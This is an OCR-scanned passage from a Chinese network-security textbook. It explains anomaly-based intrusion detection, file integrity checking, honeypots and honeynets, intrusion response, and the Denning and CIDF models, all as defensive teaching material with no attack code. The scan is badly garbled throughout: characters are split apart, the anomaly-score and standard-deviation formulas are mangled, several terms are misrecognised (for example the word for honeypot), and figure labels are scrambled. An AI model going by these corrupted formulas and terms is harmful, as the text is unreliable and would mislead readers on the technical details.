7.3.2 异常 检测 技术 


误 用 检测 技术 需要 已 知 入 侵 的 行为 模式 ， 所 以 不 能 检测 未 知 的 入 侵 。 异 常 检 测 则 可 以 
检测 未 知 的 入 侵 。 基 于 异常 检测 的 入 侵 检测 首先 要 构建 用 户 正 常 行为 的 统计 模型 ， 然 后 将 
当前 行为 与 正常 行为 特征 相 比较 来 检测 入 侵 。 常 用 的 异常 检测 技术 有 概率 统计 方法 和 神经 
网 络 方法 两 种 。 

1. 概率 统计 方法 


概率 统计 方法 是 异常 检测 技术 中 应 用 最 早 也 是 最 多 的 一 种 方法 。 首 先 ， 检 测 器 根据 用 
户 的 动作 建立 用 户 特征 表 ， 通 过 比较 当前 特征 与 已 存储 定型 的 特征 ， 从 而 判断 是 否 为 异常 
行为 。 用 户 特征 表 需 要 根据 审计 记录 情况 不 断 加 以 更 新 。 
用 于 描述 特征 的 变量 类 型 有 以 下 几 种 。 

Q 操作 密度 : 度量 操作 执行 的 频率 ， 常 用 于 检测 一 段 时 间 内 的 异常 行为 。 

@ 审计 记录 分 布 : 度量 在 最 新 记录 中 所 有 操作 类 型 的 分 布 情况 。 

图 范畴 尺度 : 度量 在 一 定 动作 范畴 内 特定 操作 的 分 布 情况 。 

@ 数值 尺度 : 度量 产生 数值 结果 的 操作 ， 如 CPU 占用 率 、LIO 使 用 频繁 程度 等 。 

这 些 变量 所 记录 的 具体 操作 包括 CPU 的 使 用 、IO 的 使 用 、 使 用 地 点 及 时 间 、 邮 件 使 用 、 
编辑 器 使 用 、 编 译 器 使 用 以 及 所 创建 、 删 除 、 访 问 或 改变 的 目录 及 文件 、 网 络 活动 等 。 


入 
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在 入 侵 检 测 研究 机 构 SRI / CSL(Stanford Research Institute /Computer Science 
Laboratory) 的 入 侵 检测 专家 系统 中 给 出 了 一 个 特征 简 表 的 结构 ， 即 

< 变量 名 ， 行 为 描述 ， 例 外 情况 ， 资 源 使 用 ， 时 间 周 期 ， 变 量 类 型 ， 门 限 值 ， 主 体 ， 
客体 ， 值 > 
其 中 的 变量 名 、 主 体 、 客 体 唯一 确定 每 一 个 特征 简 表 ， 特 征 值 由 系统 根据 审计 数据 周 
期 性 地 产生 。 这 个 特征 值 是 所 有 用 户 特征 异常 程度 值 的 函数 。 如 果 假 设 S41，5,，…，5, 分 
别 是 用 于 描述 特征 的 变量 M1，Ms，…，M 的 异常 程度 值 ，SK 二 1，2，…，n) 值 越 大 ， 说 
明 异 常 程度 越 大 。 这 个 特征 值 可 以 用 所 有 5i 值 的 加 权 平 方 和 来 表示 ， 即 

M=as?t +as? +4 +a,s’, a,>0 i=1,2,4 ,n 

式 中 ，ai 为 每 一 种 特征 的 权重 。 

如 果 选 用 标准 偏差 作为 判别 准则 ， 则 标准 偏差 计算 公式 为 


o=yM|(n-D)-v 
其 中 ，vw =M/n。 


如 果 某 异常 程度 值 8 超出 了 vb 二 ac ， 就 认为 出 现 异常 。 

概率 统计 方法 的 优越 性 在 于 能 应 用 成 熟 的 概率 统计 理论 。 但 也 有 一 些 不 足 之 处 ， 如 统 
计 检 测 对 事件 发 生 的 次 序 不 敏感 ， 也 就 是 说 ， 完 全 依靠 统计 理论 可 能 漏 检 那些 利用 彼此 关 
联 事件 的 入 侵 行为 。 其 次 ， 定 义 是 否 入 侵 的 异常 程度 值 S 也 比较 困难 。S 太 低 ， 则 漏 检 率 
提高 ，$ 太 高 ， 则 误 检 率 提高 。 


2. 神经 网 络 方法 


利用 神经 网 络 检测 入 侵 的 基本 思想 是 用 一 系列 信息 单元 (命令 ) 训 练 神 经 元 ， 这 样 在 给 
定 一 组 输入 值 后 就 可 能 预测 出 输出 结果 。 与 统计 理论 相 比 ， 神 经 网 络 更 好 地 表达 了 变量 间 
的 非 线性 关系 ， 并 且 能 自动 学 习 和 更 新 。 试 验 表明 ，UNIX 系统 管理 员 的 行为 几乎 全 是 可 
以 预测 的 ， 不 可 预测 的 行为 只 占 了 很 少 的 一 部 分 。 

神经 网 络 模块 结构 是 当前 命令 和 刚 过 去 的 个 命令 组 成 了 神经 网 络 的 输入 层 ， 其 中 入 是 
神经 网 络 预 测 下 一 个 命令 时 所 包含 的 过 去 命令 集 的 大 小 。 根 据 用 户 的 典型 命令 序列 训练 网 络 
后 ， 该 网 络 就 形成 了 对 应 用 户 的 特征 命令 表 ， 网 络 对 当前 用 户 事件 与 用 户 的 特征 命令 表 中 的 
事件 进行 比较 ， 预 测 用 户 行为 是 否 异 常 。 基 于 神经 网 络 的 检测 思想 其 示意 图 如 图 7.2 所 示 。 


ng 预测 的 下 一 个 命令 
pwd 
Vv 
输入 层 输出 层 


图 7.2 用 于 入 侵 检 测 的 神经 网 络 示意 图 
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图 中 ， 输 入 层 的 个 箭头 代表 了 用 户 最 近 的 YX 个 命令 ， 输 出 层 预 测 用 户 将 要 发 生 的 下 
一 个 动作 。 神 经 网 络 方法 的 优点 在 于 能 更 好 地 处 理 原始 数据 的 随机 特征 ， 即 不 需要 对 这 些 
数据 做 任何 统计 假设 ， 并 且 有 较 好 的 抗 干扰 能 力 。 缺 点 在 于 网 络 拓扑 结构 以 及 各 元 素 的 权 
重 很 难 确 定 ， 命 令 窗口 N 的 大 小 也 难以 选取 。 窗 口 太 小 ， 则 网 络 输出 不 好 ;窗口 太 大 ， 则 
网 络 会 因为 处 理 大 量 无 关 数据 而 降低 效率 。 


7.3.3 ”高 级 检测 技术 


高 级 检测 技术 主要 包括 文件 完整 性 检查 、 计 算 机 免疫 技术 、 遗 传 算法 、 模 糊 证 据 理 
论 、 数 据 挖掘 和 数据 融合 等 。 


1. 文件 完整 性 检查 


文件 完整 性 检查 系统 检查 计算 机 中 自 上 次 检查 后 文件 的 变化 情况 ， 它 能 够 保存 每 个 文 
件 的 数字 文摘 数据 库 ， 每 次 检查 时 重新 计算 文件 的 数字 文摘 ， 并 将 其 与 数据 库 中 的 值 相 比 
较 。 如 不 同 ， 则 说 明文 件 已 被 修改 ， 若 相同 ， 则 说 明文 件 未 发 生变 化 。 

文件 的 数字 文摘 通过 Hash 函数 计算 得 到 。 不 管 文件 长 度 如 何 ， 其 计算 结果 是 一 个 固 
定 长 度 的 数字 。 与 加 密 算法 不 同 ，Hash 算法 是 一 个 不 可 逆 的 单 向 函数 。 采 用 安全 性 高 的 
Hash 算法 ， 如 MD5、SHA 时 ， 两 个 不 同 的 文件 几乎 不 可 能 得 到 相同 的 Hash 结果 。 因 
此 ， 文 件 一 旦 被 修改 ， 就 可 检测 出 来 。 

在 文件 完整 性 检查 中 功能 最 全 面 的 当 属 Tripwire， 其 开放 源 代码 的 版 本 可 以 从 
Http://www.tripwire.org 中 获得 。 文 件 完整 性 检查 系统 具有 以 下 优点 ， 从 数学 上 分 析 ， 攻 克 
文件 完整 性 检查 系统 ， 无 论 是 时 间 上 还 是 空间 上 都 是 不 可 能 的 。 文 件 完整 性 检查 系统 具有 
相当 的 灵活 性 ， 可 以 配置 成 监测 系统 中 的 所 有 文件 或 某 些 重要 文件 。 当 一 个 入 侵 者 攻击 系 
统 时 ， 首 先 ， 他 要 通过 更 改 系统 中 的 可 执行 文件 、 库 文件 或 日 志文 件 来 隐藏 他 的 活动 其 
次 ， 他 要 做 一 些 改动 以 保证 下 次 能 够 继续 入 侵 。 这 两 种 活动 都 能 够 被 文件 完整 性 检查 系统 
检测 出 来 。 

文件 完整 性 检查 系统 的 弱点 是 依赖 于 本 地 的 文摘 数据 库 。 与 日 志文 件 一 样 ， 这 些 数据 
可 能 被 入 侵 者 修改 。 当 一 个 入 侵 者 取得 管理 员 权 限时 ， 在 完成 破坏 活动 后 可 以 运行 文件 完 
整 性 检查 系统 更 新 数据 库 ， 从 而 瞒 过 系统 管理 员 。 做 一 次 完整 的 文件 完整 性 检查 非常 耗 
时 。 在 Tripwire 中 ， 可 选择 检查 某 些 系统 特性 而 不 是 完全 的 摘要 ， 从 而 加 快 检查 速度 。 系 
统 有 些 正常 的 更 新 操作 可 能 会 带 来 大 量 的 文件 更 新 ， 从 而 产生 比较 繁杂 的 检查 与 分 析 工 
作 ， 如 在 Windows NT 系统 中 升级 Outlook 将 会 带 来 1800 多 个 文件 变化 等 。 


2. 计算 机 免疫 技术 


Forrest 等 人 首次 提出 计算 机 免疫 技术 ， 这 种 免疫 机 制 在 处 理 外 来 异常 时 呈现 了 分 布 
的 、 多 样 性 的 、 自 治 的 以 及 自修 复 的 特征 ， 免 疫 系统 通过 识别 异常 或 以 前 未 出 现 的 特征 来 
确定 入 侵 。 计 算 机 免疫 技术 为 入 侵 检 测 提供 了 一 个 思路 ， 即 通过 正常 行为 的 学 习 来 识别 不 
符合 常态 的 行为 序列 。 

当 系 统 的 一 个 关键 程序 投入 使 用 后 ， 其 与 系统 用 户 行为 的 易 变 性 相 比 ， 具 有 相对 的 稳 
定性 。 因 而 可 以 利用 系统 进程 正常 执行 轨迹 中 的 系统 调用 序列 集 ， 来 构建 系统 进程 正常 执 


(a. 


pm mm 计算 机 网 络 信息 安全 (第 2 版 ) 


行 活动 的 特征 轮廓 。 由 于 利用 这 些 关 键 程序 的 缺陷 进行 攻击 时 ， 对 应 的 进程 必然 执行 一 些 
不 同 于 正常 执行 时 的 代码 分 支 ， 因 而 就 会 出 现 关键 程序 特征 轮廓 中 没有 的 系统 调用 序列 。 
当 检 测 到 该 调用 序列 的 量 达 到 某 一 条 件 后 ， 就 认为 被 监控 的 进程 企图 攻击 系统 。 

只 有 获得 程序 运行 的 所 有 情况 的 执行 轨迹 ， 才 能 使 得 到 的 程序 特征 轮廓 很 好 地 刻画 程 
序 的 特征 ， 从 而 降低 虚 警 率 。 用 这 种 方法 检测 不 出 能 够 利用 程序 合法 活动 获取 非 授权 存 取 
的 攻击 ， 因 此 ， 这 项 技术 还 需要 进一步 深入 研究 。 

3. 遗传 算法 

遗传 算法 的 基本 思想 来 源 于 Darwin 的 进化 论 和 Mendel 的 遗传 学 说 ， 最 早 由 
J.D.Bagley 在 1967 年 提出 。 遗 传 算法 在 入 侵 检测 中 的 应 用 时 间 不 长 ， 在 一 些 研究 试验 中 ， 
利用 若干 字符 串 序 列 来 定义 用 于 分 析 检 测 的 指令 组 ， 这 些 指令 在 初始 训练 阶段 不 断 进 化 ， 
提高 分 析 能 力 。 此 外 ， 也 有 人 将 遗传 算法 与 神经 网 络 相 结合 ， 将 其 应 用 于 网 络 的 学 习 、 网 
络 的 结构 设计 和 网 络 的 分 析 等 方面 ， 然 后 应 用 到 入 侵 检测 领域 。 

遗传 算法 虽然 潜力 巨大 、 前 景 宽广 ， 但 其 本 身 还 有 很 多 问题 需要 研究 ， 还 存在 各 种 不 
足 ， 应 用 还 有 待 于 进一步 的 研究 。 

4. 模糊 证 据 理论 

入 侵 检测 的 评判 标准 本 身 就 具有 一 定 的 模糊 性 ， 模 糊 证 据 理 论 因 此 被 引入 到 入 侵 检 测 
中 。 李 之 党 等 建立 了 一 种 基于 模糊 专家 系统 的 入 侵 检测 框架 模型 ， 该 模型 吸收 了 误 用 检测 
和 异常 检测 的 优点 ， 能 较 好 地 降低 漏 警 率 和 虚 警 率 。 


5. 数据 挖掘 


数据 挖掘 (Data Mining) 也 称 数据 库 中 的 知识 发 现 (Knowledge Discovery in Database， 
KDD)。 数 据 挖掘 是 指 从 大 型 数据 库 中 提取 人 们 感 兴趣 的 知识 ， 提 取 的 知识 一 般 可 表示 为 
概念 (Concepts)、 规 则 (Rules)、 规 律 (Regularities) 和 模式 (Patterns) 等 形式 。 数 据 挖掘 是 一 门 
交叉 性 学 科 ， 涉 及 机 器 学 习 、 模 式 识别 、 归 纳 推理 、 统 计 学 、 数 据 库 、 数 据 可 视 化 以 及 高 
性 能 计算 等 多 个 领域 。 

数据 挖掘 技术 在 入 侵 检 测 中 主要 有 两 个 方向 : 一 是 发 现 入 侵 的 规则 、 模 式 ， 与 模式 匹 
配 检 测 方法 相 结合 ; 二 是 用 于 异常 检测 ， 找 出 用 户 正常 行为 ， 创 建 用 户 的 正常 行为 库 。 提 
出 这 个 技术 的 目的 之 一 是 为 了 弥补 模式 匹配 技术 对 未 知 攻击 无 能 为 力 的 弱点 ， 还 有 就 是 使 
检测 模型 的 构建 自动 化 ， 发 展 异 常 检测 方法 。 

6. 数据 融合 

数据 融合 是 针对 同一 系统 中 使 用 多 个 或 多 类 传感器 这 一 特定 问题 展开 的 一 种 新 的 数据 
处 理 方法 ， 因 此 数据 融合 又 称 为 多 传感器 信息 融合 或 信息 融合 。 多 传感器 数据 融合 的 定义 
可 概括 为 充分 利用 不 同时 间 与 空间 的 多 传感器 数据 资源 ， 采 用 计算 机 技术 对 按时 间 序 列 获 
得 的 多 传感器 观测 数据 ， 在 一 定 规则 下 进行 分 析 、 综 合 、 支 配 和 使 用 ， 获 得 对 被 测 对 象 的 一 
致 性 解释 与 描述 ， 进 而 实现 相应 的 决策 和 评估 ， 使 系统 获得 比 其 各 组 成 部 分 更 充分 的 信息 。 

多 传感器 系统 是 数据 融合 的 硬件 基础 ， 多 源 信 息 是 数据 融合 的 加 工 对 象 ， 协 调 优 化 和 
综合 处 理 是 数据 融合 的 核心 。 
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数据 融合 系统 主要 有 局 部 式 和 全 局 式 两 种 。 局 部 式 又 称 为 自 备 式 ， 这 种 数据 融合 系统 
收集 来 自 单个 平台 的 多 个 传感器 数据 ， 也 可 以 用 于 检测 对 象 相对 单一 的 智能 检测 系统 中 。 
全 局 式 又 称 为 区 域 式 ， 这 种 数据 融合 系统 组 合 来 自 空 间 和 时 间 上 各 不 相同 的 多 平台 、 多 个 
传感器 的 数据 ， 大 型 军事 防御 系统 与 多 参数 或 参数 间 交 叉 影响 的 智能 检测 系统 大 都 采用 这 
种 融合 方式 。 

多 传感器 数据 融合 与 单传 感 器 处 理 相 比 ， 复 杂 性 大 大 增加 。 

数据 融合 的 入 侵 检测 系统 要 能 够 提供 高 质量 的 信息 即 提供 的 信息 要 比 没有 采用 融合 的 
系统 提供 的 信息 具有 更 高 的 质量 。 因 此 ， 能 降低 系统 的 误 报 数量 和 误 警 率 。 


7.3.4 “入 侵 诱骗 技术 


1. 概念 


入 侵 诱 骗 技 术 是 较 传统 入 侵 检 测 技术 更 为 主动 的 一 种 安全 技术 。 入 侵 诱骗 技术 包括 密 
饶 (Honeypob 和 窄 网 [Honeyneb 两 种 ， 加 载 蜜 缸 技术 和 蜜 网 技术 的 系统 分 别称 为 蜜 缸 系统 和 
蜜 网 系统 。 顾 名 思 义 ， 入 侵 诱骗 技术 就 是 用 特有 的 特征 吸引 攻击 者 ， 以 便 对 攻击 者 的 各 种 
攻击 行为 进行 分 析 ， 并 找到 有 效 的 对 付 方法 。 为 了 吸引 攻击 者 ， 网 络 安全 专家 通常 还 在 
Honeypot 上 故意 留 下 一 些 安全 后 门 ， 或 者 放置 一 些 网 络 攻击 者 希望 得 到 的 敏感 信息 (当然 
这 些 信 息 都 是 虚假 信息 )。 当 攻击 者 正 为 攻 入 目标 系统 而 沾沾自喜 ， 他 在 目标 系统 中 的 所 有 
行为 ， 包 括 输入 的 字符 、 执 行 的 操作 等 都 已 经 被 Honeypot 所 记录 。 


2. 寞 钠 技 术 


Honeypot 是 一 种 被 侦 听 、 被 攻击 或 已 经 被 入 侵 的 资源 ， 也 就 是 说 ， 无 论 如 何 对 
Honeypot 进行 配置 ， 最 终 目 的 就 是 使 得 整个 系统 处 于 被 侦 听 、 被 攻击 的 状态 。Honeypot 并 
非 一 种 安全 解决 方案 ， 这 是 因为 它 并 不 会 “修理 ”任何 错误 ， 它 只 是 一 种 工具 ， 如 何 使 用 
这 个 工具 取决 于 使 用 者 想 要 做 到 什么 。 

Honeypot 可 以 仅仅 是 一 个 对 其 他 系统 和 应 用 的 仿真 ， 也 可 以 创建 一 个 监禁 环境 将 攻击 
者 围困 其 中 ， 还 可 以 是 一 个 标准 的 产品 系统 。 无 论 使 用 者 如 何 建 立 和 使 用 Honeypot， 只 有 
Honeypot 受到 攻击 ， 其 作用 才能 发 挥 出 来 。 

为 了 方便 攻击 者 攻击 ， 最 好 是 将 Honeypot 设置 成 域名 服务 器 (Domain Name Server， 
DNS)、Web 或 电子 邮件 转发 服务 等 流行 应 用 中 的 某 一 种 。 

从 传统 意义 上 讲 ， 网 络 安全 要 做 的 工作 主要 是 防御 ， 防 止 自己 负责 的 资源 免 受 入 侵 攻 
击 ; 尽力 保护 自己 的 系统 ， 检 测 防御 中 的 失误 ， 并 采取 相应 的 措施 ， 这 些 安 全 措施 都 只 能 
检测 到 已 知 类 型 的 攻击 和 入 侵 。 而 Honeynet 设计 的 目的 就 是 从 现存 的 各 种 威胁 中 提取 有 用 
的 信息 ， 发 现 新 型 的 攻击 工具 ， 确 定 攻击 的 模式 并 研究 攻击 者 的 攻击 动机 。 


3. 蜜 网 技术 


Honeynet 可 以 获取 攻击 者 信息 ， 大 部 分 传统 的 Honeypot 都 进行 对 攻击 的 诱骗 或 检 
测 。 这 些 传统 的 Honeypot 通常 都 是 一 个 单独 的 系统 ， 用 于 模拟 其 他 系统 、 已 知 的 服务 和 
弱点 。Honeynet 不 同 于 传统 的 Honeypot， 它 并 不 是 一 种 比 传统 的 Honeypot 更 好 的 解决 方 
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案 ， 只 是 其 侧重 点 不 同 而 已 。 其 工作 实质 是 在 各 种 网 络 迹象 中 获取 所 需 的 信息 ， 而 不 是 对 
攻击 进行 诱骗 或 检测 。 

Honeynet 在 设计 上 与 Honeypot 有 两 点 不 同 。 

(1) Honeynet 不 是 一 个 单独 的 系统 ， 而 是 由 多 个 系统 和 多 个 攻击 检测 应 用 组 成 的 网 
络 。 这 个 网 络 放置 在 防火 墙 后 ， 可 以 监控 、 捕 获 并 控制 所 有 进出 网 络 的 数据 ， 根 据 捕获 的 
数据 信息 分 析 的 结果 就 可 以 得 到 攻击 组 织 所 使 用 的 工具 、 策 略 和 动机 。 

Honeynet 内 可 以 同时 包含 多 种 系统 ， 比 如 Solaris、Linux、Windows NT、Cisco 路 由 
器 和 Alteon 交换 机 等 ， 可 以 创建 一 个 反映 真实 产品 情况 的 网 络 环境 。 此 外 ， 不 同 的 系统 还 
可 以 采用 不 同 的 应 用 ， 比 如 Linux DNS 服务 器 、Windows IIS 网 络 服务 器 和 Solaris 数据 库 
服务 器 等 ， 这 样 就 可 以 更 加 准确 地 概括 不 同 攻击 者 的 不 同意 图 和 特点 。 

(2) 所 有 放置 在 Honeynet 中 的 系统 都 是 标准 的 产品 系统 。 这 些 系统 和 应 用 都 是 用 户 可 
以 在 Intemet 上 找到 的 真实 系统 和 应 用 。 该 网 络 中 的 任何 一 部 分 都 不 是 模拟 的 应 用 ， 并 且 
这 些 应 用 都 具有 与 真实 系统 相同 的 安全 等 级 。 因 此 ， 在 Honeynet 中 发 现 的 漏洞 和 弱点 就 是 
真实 存在 需要 改进 的 问题 ， 用 户 所 需 做 的 就 是 将 系统 从 产品 环境 移植 到 Honeynet 中 。 


7.3.5 入侵 响应 技术 


入 侵 响 应 技术 是 入 侵 检测 技术 的 配套 技术 ， 一 般 的 入 侵 检测 系统 会 同时 使 用 这 两 种 技 
术 。 根 据 系统 设计 的 功能 和 目的 不 同 ， 有 时 也 称 以 实施 入 侵 响应 技术 为 主 的 系统 为 入 侵 响 
应 系统 。 

入 侵 响应 技术 可 分 为 主动 响应 和 被 动 响应 两 种 类 型 。 在 主动 响应 里 ， 入 侵 检 测 系统 能 
阻塞 攻击 ， 或 影响 进而 改变 攻击 的 进程 ， 在 被 动 攻击 里 ， 入 侵 检测 系统 仅仅 简单 地 报告 和 
记录 所 检测 出 的 问题 。 主 动 响应 和 被 动 响应 并 不 是 相互 排斥 的 。 不 管 使 用 哪 一 种 响应 机 
制 ， 入 侵 检 测 系统 总 能 以 日 志 的 形式 记录 检测 结果 。 


1. 主动 响应 


即 检测 到 入 侵 后 立即 采取 行动 。 主 动 响应 有 两 种 形式 : 一 种 是 由 用 户 驱动 的 ， 另 一 种 
系统 本 身 自 动 执行 的 。 对 入 侵 者 采取 反击 行动 ， 修 正 系统 环境 和 收集 尽 可 能 多 的 信息 
E 动 响应 的 基本 手段 。 

1) 对 入 侵 者 采取 反击 行动 

警告 攻击 者 、 跟 踪 攻 击 者 、 断 开 危 险 连接 和 对 攻击 者 的 攻击 是 最 严厉 的 一 种 主动 反 
手段 。 这 种 响应 方法 具有 一 定 的 风险 。 

(1) 根据 黑客 最 常用 的 攻击 方法 ， 被 确认 为 攻击 的 源头 系统 很 可 能 是 黑客 的 另 一 个 牺 
牲 品 。 成 功 攻击 一 个 系统 ， 然 后 使 用 它 作为 攻击 另 一 个 系统 的 平台 ， 这 是 攻击 者 基本 的 手 
段 之 一 。 如 果 瞄 准 这 个 攻击 源头 系统 ， 很 可 能 反击 的 是 一 个 无 率 的 同伴 。 

(2) 即使 攻击 者 确实 来 自 一 个 合法 控制 的 系统 ， 但 如 果 使 用 攻击 源 人 P 地 址 欺骗 ， 攻 
系统 的 源头 他 地 址 实际 上 可 能 是 另 一 个 牺牲 者 。 

(3) 简单 的 反击 可 能 会 车 起 对 手 更 大 的 攻击 。 

(4) 在 许多 情况 下 ， 反 击 会 冒 违 法 犯罪 的 风险 。 如 果 你 的 行为 攻击 了 无 率 的 一 方 ， 该 
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方 可 能 要 控告 你 ， 并 要 求 赔偿 其 损失 。 更 进一步 ， 你 的 反击 本 身 可 能 违反 了 计算 机 相关 法 规 。 

对 入 侵 者 采取 反击 行动 也 可 以 以 温和 的 方式 进行 。 比 如 ， 记 录 安 全 事件 、 产 生 报警 信 
息 、 记 录 附 加 日 志和 激活 附加 入 侵 检测 工具 等 。 

介 于 温和 与 严厉 之 间 的 手段 有 隔离 入 侵 者 全、 禁止 被 攻击 对 象 的 特定 端口 和 服务 以 及 
隔离 被 攻击 对 象 等 。 另 一 种 响应 方式 是 自动 地 向 入 侵 者 可 能 来 自 的 系统 管理 员 发 E-mail, 
并 且 请 求 协助 确认 入 侵 者 和 处 理 相关 问题 。 当 黑客 通过 拨号 连接 进入 系统 时 ， 这 种 响应 方 
式 还 能 产生 多 种 用 途 。 

2) 修正 系统 环境 

修正 系统 环境 较 直接 采取 反击 的 主动 性 要 差 一 些 ， 当 与 提供 调查 支持 的 响应 结合 在 一 
起 时 ， 却 往往 是 一 种 更 好 的 响应 方案 。 在 一 些 入 侵 检测 系统 中 ， 这 类 响应 也 许 通 过 增加 敏 
感 程度 改变 分 析 引 擎 的 操作 特征 ， 通 过 插入 规则 改变 专家 系统 ， 即 通过 这 些 规则 提高 对 某 
些 攻 击 的 怀疑 水 平 ， 或 增加 监视 范围 以 更 好 地 收集 信息 。 这 种 策略 类 似 于 实时 过 程控 制 系 
统 的 反馈 机 制 ， 即 目前 系统 处 理 过 程 的 输出 将 用 来 调整 和 优化 下 一 个 处 理 过 程 。 

3) 收集 额外 信息 

主动 响应 的 第 三 种 方法 是 收集 额外 信息 。 当 被 保护 的 系统 非常 重要 且 系 统 的 主人 想 进 
行 配置 改进 时 ， 这 种 方法 特别 有 用 。 前 面 提 到 的 密 钠 技 术 实际 上 就 是 一 种 有 效 的 收集 信息 
的 手段 ， 以 这 种 方式 收集 的 信息 对 那些 网 络 安全 威胁 趋势 分 析 人 员 来 说 也 是 有 价值 的 。 

2. 被 动 响应 

被 动 响应 就 是 只 向 用 户 提供 信息 ， 而 由 用 户 去 决定 是 否 采 取 下 一 步行 动 的 响应 。 在 早 
期 的 入 侵 检测 系统 里 ， 所 有 的 响应 都 是 被 动 的 。 以 下 列举 两 种 常用 的 被 动 响应 技术 。 

1) 告警 和 通知 

绝 大 多 数 入 侵 检测 系统 提供 多 种 形式 的 告警 生成 方式 以 供 选择 ， 人 允许 用 户 设置 告警 以 
适合 本 组 织 的 系统 操作 程序 规范 。 

(1) 告警 显示 屏 。 

入 侵 检测 系统 提供 的 最 常用 的 告警 和 通知 方式 是 屏幕 告警 或 窗口 告警 ， 这 种 告警 消息 
出 现在 入 侵 检测 系统 控制 台 上 ， 或 由 用 户 配置 的 其 他 系统 上 。 在 告警 消息 方面 ， 不 同 的 系 
统 提供 不 同 的 翔实 程度 ， 范 围 从 简单 的 “一 个 入 侵 已 经 发 生 ” 到 列 出 此 问题 的 表面 源头 、 
攻击 目标 、 入 侵 的 本 质 意图 以 及 攻击 是 否 成 功 等 广泛 性 记录 。 在 一 些 系 统 里 告警 消息 的 内 
容 也 可 以 用 户 定制 。 

(2) 告警 和 警报 的 远程 通知 。 

按时 钟 协调 运行 多 系统 的 组 织 使 用 另 一 种 告警 / 警报 形式 。 在 这 些 情形 下 ， 入 侵 检 测 
系统 能 通过 拨号 或 移动 电话 向 系统 管理 员 或 安全 工作 人 员 发 出 告警 和 警报 消息 。 

E-mail 消息 是 另 一 种 通知 手段 ， 在 某 些 情形 下 ， 通 知 选项 允许 用 户 配置 附加 信息 或 告 
警 编码 给 相应 单位 。 

2) SNMP 陷阱 和 插件 

Intemet 上 的 SNMP 陷阱 服务 接收 由 本 地 或 远程 SNMP 代理 生成 的 陷阱 消息 ， 然 后 
将 这 些 消息 转发 给 您 的 计算 机 上 运行 的 SNMP 管理 程序 。 为 代理 配置 了 SNMP 陷阱 服 
务 后 ， 如 果 发 生 任 何 特定 的 事件 ， 都 将 生成 陷阱 消息 。 这 些 消 息 被 发 送 到 陷阱 目标 。 例 
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如 ， 
标 包 


是 启 


可 以 将 代理 配置 为 在 无 法 识别 的 管理 系统 发 送信 息 请 求 时 启动 身份 验证 陷阱 。 陷 阱 目 
笑 管理 系统 的 计算 机 名 、 卫 地 址 或 Internet 数据 包 交换 (IPX) 地 址 。 陷 阱 目标 必须 


台 | 


网 络 并 且 运 行 SNMP 管理 软件 的 主机 。 
有 些 入 侵 检测 系统 与 网 络 管理 工具 一 起 使 用 。 它 能 使 用 网 络 管理 基础 设施 来 传送 在 网 


络 管理 控制 台 显示 的 告警 和 警报 信息 ， 它 依附 简单 网 络 管理 协议 (SNMP) 的 消息 或 陷阱 作为 


告警 选项 。 一 些 商业 化 产品 里 提供 这 个 功能 选项 ， 入 侵 检 测 系统 有 可 能 和 网 络 管理 系 


统 更 彻底 地 集成 在 一 起 。 这 种 集成 能 提高 使 用 通信 信道 的 能 力 和 网 络 环境 中 对 安全 提供 主 


动 n 


向 应 的 能 力 。 


7.4 入 侵 检 测 体系 


本 节 在 给 出 通用 入 侵 检测 模型 的 基础 上 ， 对 主机 入 侵 检 测 系统 、 网 络 入 侵 检测 系统 和 


分 布 式 入 侵 检 测 系统 的 概念 和 特点 进行 集中 讲解 。 
7.4.1 入 侵 检测 模型 


(ma. 


为 更 好 地 研究 入 侵 检测 系统 ， 人 们 将 其 各 个 组 成 部 分 抽象 出 来 ， 形 成 各 种 入 侵 检测 模 


。 较 通用 的 模型 有 Denning 模型 和 CIDF 模型 。 


1. Denning 模型 
Denning 于 1987 年 提出 了 一 个 通用 的 入 侵 检 测 模型 ， 如 图 7.3 所 示 。 


规则 处 理 
引擎 


图 7.3 ”Denning 入 侵 检测 模型 


图 7.3 所 示 模 型 中 包含 6 个 主要 部 分 。 

主体 (Subjects): 在 目标 系统 上 活动 的 实体 ， 如 用 户 。 

@ 对 象 (Objects): 指 系统 资源 ， 如 文件 、 设 备 、 命 令 等 。 

@ 审计 记录 (Audit Records)， 由 主体 、 活 动 (Action)、 异 常 条 件 (Exception-Condition)、 
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资源 使 用 状况 (Resource-Usage) 和 时 间 戳 (Time-Stamp) 等 组 成 。 其 中 活动 是 指 主 体 对 目标 的 操 
作 ， 蜡 常 条件 是 指 系统 对 主体 的 异常 情况 的 报告 ， 资 源 使 用 状况 是 指 系统 的 资源 消耗 情况 。 
图 活动 档案 (Active Profile): 即 系统 正常 行为 模型 ， 保 存 系 统 正 常 活动 的 有 关 信 息 。 
在 各 种 检测 方法 中 其 实现 各 不 相同 。 在 统计 方法 中 可 以 从 事件 数量 、 频 度 、 资 源 消耗 等 方 
度量 。 

@ 异常 记录 (Anomaly Record): 由 事件 、 时 间 惟 和 审计 记录 组 成 ， 表 示 异 常事 件 的 发 
生 情 况 。 

@ 活动 规则 (Active Rule): 判断 是 否 为 入 侵 的 准则 及 要 采取 的 行动 。 一 般 以 系统 正常 
活动 模型 为 基准 ， 根 据 专家 系统 或 统计 方法 对 审计 记录 进行 分 析 处 理 ， 在 发 现 入 侵 时 采取 
相应 的 对 策 。 

2. CIDF 模型 


CIDF(Common Intruction Detection Framework， 入 侵 检测 系统 的 通用 模型 ) 包 括 入 侵 检 
测 系统 的 体系 结构 、 通 信 机 制 、 描 述 语言 和 应 用 编程 接口 (APD 等 4 个 方面 。 其 中 体系 结构 
如 图 7.4 所 示 。 模 型 中 ， 入 侵 检测 系统 分 为 4 个 基本 组 件 即 事件 产生 器 、 事 件 分 析 器 、 响 
应 单元 和 事件 数据 库 。 其 中 的 事件 是 指 入 侵 检测 系统 需要 分 析 的 数据 。 


Pe 输出 : 反应 或 事件 


输出 :高 级 中 断 事件 输出 :事件 的 存储 信息 


i 


| ! 输出 :原始 或 低级 事件 
i 事件 产生 器 上--------------! 


! 输出 :原始 事件 集 


图 7.4 CIDF 入 侵 检测 模型 


这 4 个 组 件 只 是 逻辑 实体 ， 一 个 组 件 可 能 是 某 台 计算 机 上 的 一 个 进程 甚至 线程 ， 也 可 
能 是 多 个 计算 机 上 的 多 个 进程 。 它 们 以 GIDO( 统 一 入 侵 检测 对 象 ) 格 式 进行 数据 交换 。 这 种 
划分 体现 了 入 侵 检测 系统 所 必须 具有 的 体系 结构 ， 即 数据 获取 、 数 据 分 析 、 行 为 响应 和 数 
据 管理 ， 因 此 具有 通用 性 。 事 件 产生 器 、 事 件 分 析 器 和 响应 单元 通常 以 应 用 程序 的 形式 出 
